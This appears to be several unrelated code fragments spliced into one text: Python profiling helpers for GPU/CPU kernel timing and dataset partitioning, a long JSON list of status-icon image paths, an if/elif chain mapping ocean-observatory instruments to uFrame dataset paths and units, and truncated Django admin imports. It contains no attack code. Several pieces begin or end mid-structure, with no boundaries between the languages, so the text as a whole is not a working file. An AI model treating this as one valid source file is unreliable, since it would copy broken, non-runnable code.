self.create_buf_end, self.write_start, self.write_end,
self.ndrange_start, self.ndrange_end, self.read_start, self.read_end)
return any(f is not None for f in fields)
def dump_device_history():
"""
Dumps device history to debug.log file.
"""
debug_strs = []
min_timestamp = Decimal('Infinity')
max_timestamp = 0.0
finishing_timestamps = {'cpu': 0.0, 'gpu': 0.0}
for dev in ['gpu', 'cpu']:
for device_id in range(len(device_history[dev])):
for host_event in device_history[dev][device_id]:
if host_event.is_not_empty():
kernel_id = host_event.kernel_id
kernel_name = host_event.kernel_name
write_start = "%.20f" % host_event.write_start
min_timestamp = min(min_timestamp, Decimal(write_start))
write_end = "%.20f" % host_event.write_end
ndrange_start = "%.20f" % host_event.ndrange_start
ndrange_end = "%.20f" % host_event.ndrange_end
read_start = "%.20f" % host_event.read_start
read_end = "%.20f" % host_event.read_end
max_timestamp = max(max_timestamp, Decimal(read_end))
debug_str = "HOST_EVENT " + dev + " " + str(device_id) + " " + str(
kernel_id) + "," + kernel_name + " " + write_start + " " + write_end + " " + \
ndrange_start + " " + ndrange_end + " " + read_start + " " + read_end
logging.debug(debug_str)
# print debug_str
debug_strs.append(debug_str)
finishing_timestamps[dev] = round(float(Decimal(read_end)-Decimal(write_start)), 4)
profile_time = max_timestamp - min_timestamp
print("span_time " + str(profile_time))
print(finishing_timestamps)
# return debug_strs
return finishing_timestamps
def partition_round(elms, percent, exact=-1, total=100, *args, **kwargs):
"""
Partitions dataset in a predictable way.
:param elms: Total Number of elements
:type elms: Integer
:param percent: Percentage of problem space to be processed on one device
:param type: Integer
:param exact: Flag that states whether percentage of problem space is greater than 50 or not (0 for percent < 50, 1 for percent >= 50)
:param type: Integer
:param total: Percentage of total problem space (Default value: 100)
:type total: Integer
:return: Number of elements of partitioned dataset
:rtype: Integer
"""
if elms < 100:
factor = 10
x = elms / 10.0
else:
factor = 1
x = elms / 100.0
if exact == -1:
exact = 0 if percent > 50 else 1
if elms % 2 == 0:
if percent == 50:
logging.debug(
"PARTITION: get_slice_values -> multiple_round -> partition_round (if percent=50) returns: %d",
elms / 2)
return int(elms / 2)
elif exact == 0:
b = int(x * (total - percent) / factor)
return partition_round(elms, total) - b if total != 100 else elms - b
elif exact == 1:
logging.debug("PARTITION: get_slice_values -> multiple_round -> partition_round (if exact=1) returns: %d",
x * percent / factor)
return int(x * percent / factor)
else:
if percent > 50:
return partition_round(elms - 1, percent, exact, total)
else:
return partition_round(elms - 1, percent, exact, total) + 1
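# Worked examples (values follow directly from the branches above):
#
#     partition_round(1000, 50)   # -> 500 (elms even, percent == 50)
#     partition_round(1000, 30)   # -> 300 (exact defaults to 1 for percent <= 50)
#     partition_round(1000, 70)   # -> 700 (exact defaults to 0 for percent > 50)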
"name": "megaphone--minus"
},
{
"url": "/images/status/megaphone--pencil.png",
"name": "megaphone--pencil"
},
{
"url": "/images/status/megaphone--plus.png",
"name": "megaphone--plus"
},
{
"url": "/images/status/megaphone.png",
"name": "megaphone"
},
{
"url": "/images/status/memory.png",
"name": "memory"
},
{
"url": "/images/status/metronome--arrow.png",
"name": "metronome--arrow"
},
{
"url": "/images/status/metronome--exclamation.png",
"name": "metronome--exclamation"
},
{
"url": "/images/status/metronome--minus.png",
"name": "metronome--minus"
},
{
"url": "/images/status/metronome--pencil.png",
"name": "metronome--pencil"
},
{
"url": "/images/status/metronome--plus.png",
"name": "metronome--plus"
},
{
"url": "/images/status/metronome.png",
"name": "metronome"
},
{
"url": "/images/status/microformats.png",
"name": "microformats"
},
{
"url": "/images/status/microphone--arrow.png",
"name": "microphone--arrow"
},
{
"url": "/images/status/microphone--exclamation.png",
"name": "microphone--exclamation"
},
{
"url": "/images/status/microphone--minus.png",
"name": "microphone--minus"
},
{
"url": "/images/status/microphone--pencil.png",
"name": "microphone--pencil"
},
{
"url": "/images/status/microphone--plus.png",
"name": "microphone--plus"
},
{
"url": "/images/status/microphone.png",
"name": "microphone"
},
{
"url": "/images/status/minus-button.png",
"name": "minus-button"
},
{
"url": "/images/status/minus-circle-frame.png",
"name": "minus-circle-frame"
},
{
"url": "/images/status/minus-circle.png",
"name": "minus-circle"
},
{
"url": "/images/status/minus-octagon-frame.png",
"name": "minus-octagon-frame"
},
{
"url": "/images/status/minus-octagon.png",
"name": "minus-octagon"
},
{
"url": "/images/status/minus-shield.png",
"name": "minus-shield"
},
{
"url": "/images/status/minus-small-circle.png",
"name": "minus-small-circle"
},
{
"url": "/images/status/minus-small-white.png",
"name": "minus-small-white"
},
{
"url": "/images/status/minus-small.png",
"name": "minus-small"
},
{
"url": "/images/status/minus-white.png",
"name": "minus-white"
},
{
"url": "/images/status/minus.png",
"name": "minus"
},
{
"url": "/images/status/mobile-phone--arrow.png",
"name": "mobile-phone--arrow"
},
{
"url": "/images/status/mobile-phone--exclamation.png",
"name": "mobile-phone--exclamation"
},
{
"url": "/images/status/mobile-phone--minus.png",
"name": "mobile-phone--minus"
},
{
"url": "/images/status/mobile-phone--pencil.png",
"name": "mobile-phone--pencil"
},
{
"url": "/images/status/mobile-phone--plus.png",
"name": "mobile-phone--plus"
},
{
"url": "/images/status/mobile-phone-cast.png",
"name": "mobile-phone-cast"
},
{
"url": "/images/status/mobile-phone-off.png",
"name": "mobile-phone-off"
},
{
"url": "/images/status/mobile-phone.png",
"name": "mobile-phone"
},
{
"url": "/images/status/money--arrow.png",
"name": "money--arrow"
},
{
"url": "/images/status/money--exclamation.png",
"name": "money--exclamation"
},
{
"url": "/images/status/money--minus.png",
"name": "money--minus"
},
{
"url": "/images/status/money--pencil.png",
"name": "money--pencil"
},
{
"url": "/images/status/money--plus.png",
"name": "money--plus"
},
{
"url": "/images/status/money-coin.png",
"name": "money-coin"
},
{
"url": "/images/status/money.png",
"name": "money"
},
{
"url": "/images/status/monitor--arrow.png",
"name": "monitor--arrow"
},
{
"url": "/images/status/monitor--exclamation.png",
"name": "monitor--exclamation"
},
{
"url": "/images/status/monitor--minus.png",
"name": "monitor--minus"
},
{
"url": "/images/status/monitor--pencil.png",
"name": "monitor--pencil"
},
{
"url": "/images/status/monitor--plus.png",
"name": "monitor--plus"
},
{
"url": "/images/status/monitor-cast.png",
"name": "monitor-cast"
},
{
"url": "/images/status/monitor-image.png",
"name": "monitor-image"
},
{
"url": "/images/status/monitor-network.png",
"name": "monitor-network"
},
{
"url": "/images/status/monitor-off.png",
"name": "monitor-off"
},
{
"url": "/images/status/monitor-screensaver.png",
"name": "monitor-screensaver"
},
{
"url": "/images/status/monitor-sidebar.png",
"name": "monitor-sidebar"
},
{
"url": "/images/status/monitor-wallpaper.png",
"name": "monitor-wallpaper"
},
{
"url": "/images/status/monitor-window-3d.png",
"name": "monitor-window-3d"
},
{
"url": "/images/status/monitor-window-flow.png",
"name": "monitor-window-flow"
},
{
"url": "/images/status/monitor-window.png",
"name": "monitor-window"
},
{
"url": "/images/status/monitor.png",
"name": "monitor"
},
{
"url": "/images/status/mouse--arrow.png",
"name": "mouse--arrow"
},
{
"url": "/images/status/mouse--exclamation.png",
"name": "mouse--exclamation"
},
{
"url": "/images/status/mouse--minus.png",
"name": "mouse--minus"
},
{
"url": "/images/status/mouse--pencil.png",
"name": "mouse--pencil"
},
{
"url": "/images/status/mouse--plus.png",
"name": "mouse--plus"
},
{
"url": "/images/status/mouse-select-right.png",
"name": "mouse-select-right"
},
{
"url": "/images/status/mouse-select-wheel.png",
"name": "mouse-select-wheel"
},
{
"url": "/images/status/mouse-select.png",
"name": "mouse-select"
},
{
"url": "/images/status/mouse.png",
"name": "mouse"
},
{
"url": "/images/status/music--arrow.png",
"name": "music--arrow"
},
{
"url": "/images/status/music--exclamation.png",
"name": "music--exclamation"
},
{
"url": "/images/status/music--minus.png",
"name": "music--minus"
},
{
"url": "/images/status/music--pencil.png",
"name": "music--pencil"
},
{
"url": "/images/status/music--plus.png",
"name": "music--plus"
},
{
"url": "/images/status/music-beam-16.png",
"name": "music-beam-16"
},
{
"url": "/images/status/music-beam.png",
"name": "music-beam"
},
{
"url": "/images/status/music-small.png",
"name": "music-small"
},
{
"url": "/images/status/music.png",
"name": "music"
},
{
"url": "/images/status/na.png",
"name": "na"
},
{
"url": "/images/status/navigation-000-button.png",
"name": "navigation-000-button"
},
{
"url": "/images/status/navigation-000-frame.png",
"name": "navigation-000-frame"
},
{
"url": "/images/status/navigation-000-white.png",
"name": "navigation-000-white"
},
{
"url": "/images/status/navigation-090-button.png",
"name": "navigation-090-button"
},
{
"url": "/images/status/navigation-090-frame.png",
"name": "navigation-090-frame"
},
{
"url": "/images/status/navigation-090-white.png",
"name": "navigation-090-white"
},
{
"url": "/images/status/navigation-090.png",
"name": "navigation-090"
},
{
"url": "/images/status/navigation-180-button.png",
"name": "navigation-180-button"
},
{
"url": "/images/status/navigation-180-frame.png",
"name": "navigation-180-frame"
},
{
"url": "/images/status/navigation-180-white.png",
"name": "navigation-180-white"
},
{
"url": "/images/status/navigation-180.png",
"name": "navigation-180"
},
{
"url": "/images/status/navigation-270-button.png",
"name": "navigation-270-button"
},
{
"url": "/images/status/navigation-270-frame.png",
"name": "navigation-270-frame"
},
{
"url": "/images/status/navigation-270-white.png",
"name": "navigation-270-white"
},
{
"url": "/images/status/navigation-270.png",
"name": "navigation-270"
},
{
"url": "/images/status/navigation.png",
"name": "navigation"
},
{
"url": "/images/status/network-cloud.png",
"name": "network-cloud"
},
{
"url": "/images/status/network-clouds.png",
"name": "network-clouds"
},
{
"url": "/images/status/network-ethernet.png",
"name": "network-ethernet"
},
{
"url": "/images/status/network-hub.png",
"name": "network-hub"
},
{
"url": "/images/status/network.png",
"name": "network"
},
{
"url": "/images/status/new.png",
"name": "new"
},
{
"url": "/images/status/newspaper--arrow.png",
"name": "newspaper--arrow"
},
{
"url": "/images/status/newspaper--exclamation.png",
"name": "newspaper--exclamation"
},
{
"url": "/images/status/newspaper--minus.png",
"name": "newspaper--minus"
},
{
"url": "/images/status/newspaper--pencil.png",
"name": "newspaper--pencil"
},
{
"url": "/images/status/newspaper--plus.png",
"name": "newspaper--plus"
},
{
"url": "/images/status/newspaper.png",
"name": "newspaper"
},
{
"url": "/images/status/newspapers.png",
"name": "newspapers"
},
{
"url": "/images/status/node-delete-child.png",
"name": "node-delete-child"
},
{
"url": "/images/status/node-delete-next.png",
"name": "node-delete-next"
},
{
"url": "/images/status/node-delete-previous.png",
"name": "node-delete-previous"
},
{
"url": "/images/status/node-delete.png",
"name": "node-delete"
},
{
"url": "/images/status/node-design.png",
"name": "node-design"
},
{
"url": "/images/status/node-insert-child.png",
"name": "node-insert-child"
},
{
"url": "/images/status/node-insert-next.png",
"name": "node-insert-next"
},
{
"url": "/images/status/node-insert-previous.png",
"name": "node-insert-previous"
},
{
"url": "/images/status/node-insert.png",
"name": "node-insert"
},
{
"url": "/images/status/node-magnifier.png",
"name": "node-magnifier"
},
{
"url": "/images/status/node-select-all.png",
"name": "node-select-all"
},
{
"url": "/images/status/node-select-child.png",
"name": "node-select-child"
},
{
"url": "/images/status/node-select-next.png",
"name": "node-select-next"
},
{
"url": "/images/status/node-select-previous.png",
"name": "node-select-previous"
},
{
"url": "/images/status/node-select.png",
"name": "node-select"
},
{
"url": "/images/status/node.png",
"name": "node"
},
{
"url": "/images/status/notebook--arrow.png",
"name": "notebook--arrow"
},
{
"url": "/images/status/notebook--exclamation.png",
"name": "notebook--exclamation"
},
{
"url": "/images/status/notebook--minus.png",
"name": "notebook--minus"
},
{
"url": "/images/status/notebook--pencil.png",
"name": "notebook--pencil"
},
{
"url": "/images/status/notebook--plus.png",
"name": "notebook--plus"
},
{
"url": "/images/status/notebook.png",
"name": "notebook"
},
{
"url": "/images/status/notebooks.png",
"name": "notebooks"
},
{
"url": "/images/status/open-share-balloon.png",
"name": "open-share-balloon"
},
{
"url": "/images/status/open-share-document.png",
"name": "open-share-document"
},
{
"url": "/images/status/open-share-small.png",
"name": "open-share-small"
},
{
"url": "/images/status/open-share.png",
"name": "open-share"
},
{
"url": "/images/status/open-source.png",
"name": "open-source"
},
{
"url": "/images/status/openid.png",
"name": "openid"
},
{
"url": "/images/status/opml-balloon.png",
"name": "opml-balloon"
},
{
"url": "/images/status/opml-document.png",
"name": "opml-document"
},
{
"url": "/images/status/opml-small.png",
"name": "opml-small"
},
{
"url": "/images/status/opml.png",
"name": "opml"
},
{
"url": "/images/status/paint-brush--arrow.png",
"name": "paint-brush--arrow"
},
{
"url": "/images/status/paint-brush--exclamation.png",
"name": "paint-brush--exclamation"
},
{
"url": "/images/status/paint-brush--minus.png",
"name": "paint-brush--minus"
},
{
"url": "/images/status/paint-brush--pencil.png",
"name": "paint-brush--pencil"
},
{
"url": "/images/status/paint-brush--plus.png",
"name": "paint-brush--plus"
},
{
"url": "/images/status/paint-brush-color.png",
"name": "paint-brush-color"
},
{
"url": "/images/status/paint-brush-small.png",
"name": "paint-brush-small"
},
{
"url": "/images/status/paint-brush.png",
"name": "paint-brush"
},
{
"url": "/images/status/paint-can--arrow.png",
"name": "paint-can--arrow"
},
{
"url": "/images/status/paint-can--exclamation.png",
"name": "paint-can--exclamation"
},
{
"url": "/images/status/paint-can--minus.png",
"name": "paint-can--minus"
},
{
"url": "/images/status/paint-can--pencil.png",
"name": "paint-can--pencil"
},
{
"url": "/images/status/paint-can--plus.png",
"name": "paint-can--plus"
},
{
"url": "/images/status/paint-can-color.png",
"name": "paint-can-color"
},
{
"url": "/images/status/paint-can-paint-brush.png",
"name": "paint-can-paint-brush"
},
{
"url": "/images/status/paint-can.png",
"name": "paint-can"
},
{
"url": "/images/status/paint-tube--arrow.png",
"name": "paint-tube--arrow"
},
{
"url": "/images/status/paint-tube--exclamation.png",
"name": "paint-tube--exclamation"
},
{
"url": "/images/status/paint-tube--minus.png",
"name": "paint-tube--minus"
},
{
"url": "/images/status/paint-tube--pencil.png", | |
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP01CNPM' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP01CNPM/WFP01/05-PARADK000/recovered_wfp/parad_k__stc_imodem_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/SBS01/01-MOPAK0000/telemetered/mopak_o_dcl_accel'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCI' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CP02PMCI/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/04-FLORTK000/telemetered/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/04-FLORTK000/recovered_wfp/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/02-DOFSTK000/telemetered/dofst_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/02-DOFSTK000/recovered_wfp/dofst_k_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/01-VEL3DK000/telemetered/vel3d_k_wfp_stc_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/01-VEL3DK000/recovered_wfp/vel3d_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'CTD' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/03-CTDPFK000/telemetered/ctdpf_ckl_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'ctdpf_ckl_seawater_temperature'
var_list[2].name = 'practical_salinity'
var_list[3].name = 'density'
var_list[4].name = 'ctdpf_ckl_seawater_pressure'
var_list[5].name = 'ctdpf_ckl_seawater_conductivity'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'unitless'
var_list[3].units = 'kg/m3'
var_list[4].units = 'dbar'
var_list[5].units = 'S/m'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'CTD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/03-CTDPFK000/recovered_wfp/ctdpf_ckl_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'ctdpf_ckl_seawater_temperature'
var_list[2].name = 'practical_salinity'
var_list[3].name = 'density'
var_list[4].name = 'ctdpf_ckl_seawater_pressure'
var_list[5].name = 'ctdpf_ckl_seawater_conductivity'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'unitless'
var_list[3].units = 'kg/m3'
var_list[4].units = 'dbar'
var_list[5].units = 'S/m'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/05-PARADK000/telemetered/parad_k__stc_imodem_instrument'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/05-PARADK000/recovered_wfp/parad_k__stc_imodem_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/SBS01/01-MOPAK0000/telemetered/mopak_o_dcl_accel'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCO' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CP02PMCO/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/04-FLORTK000/telemetered/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCO/WFP01/04-FLORTK000/recovered_wfp/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/02-DOFSTK000/telemetered/dofst_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCO/WFP01/02-DOFSTK000/recovered_wfp/dofst_k_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/01-VEL3DK000/telemetered/vel3d_k_wfp_stc_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units = 'dbar'
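# The branches above each follow the same recipe for one (platform_name, node,
# instrument_class, method) combination: pick a uFrame dataset path, then fill
# parallel .name/.data/.units slots on var_list. A minimal data-driven sketch
# of the same dispatch follows; it is illustrative only. The STREAMS entry is
# copied from the CP02PMCI CTD/Telemetered branch above, and the var_list
# elements are assumed to accept the same attributes used throughout this file.
STREAMS = {
    ('CP02PMCI', 'PROFILER', 'CTD', 'Telemetered'): (
        'CP02PMCI/WFP01/03-CTDPFK000/telemetered/ctdpf_ckl_wfp_instrument',
        [('time', 'seconds since 1900-01-01'),
         ('ctdpf_ckl_seawater_temperature', 'degC'),
         ('practical_salinity', 'unitless'),
         ('density', 'kg/m3'),
         ('ctdpf_ckl_seawater_pressure', 'dbar'),
         ('ctdpf_ckl_seawater_conductivity', 'S/m')],
    ),
}

def configure_stream(var_list, platform_name, node, instrument_class, method):
    """Resolve one table entry instead of walking the if/elif chain."""
    dataset, fields = STREAMS[(platform_name, node, instrument_class, method)]
    for i, (name, units) in enumerate(fields):
        var_list[i].name = name
        var_list[i].data = np.array([])
        var_list[i].units = units
    return dataset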
import traceback,sys
import hglib
import threading
import logging
from django.db import connection,transaction
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.utils import timezone
from reversion.admin import VersionAdmin
from tablemanager.models import (
ForeignTable, Input, NormalTable,
Normalise, Workspace, Publish,
Normalise_NormalTable,
PublishChannel,DataSource,DatasourceType
)
from tablemanager.forms import (
NormaliseForm,PublishForm,ForeignTableForm,
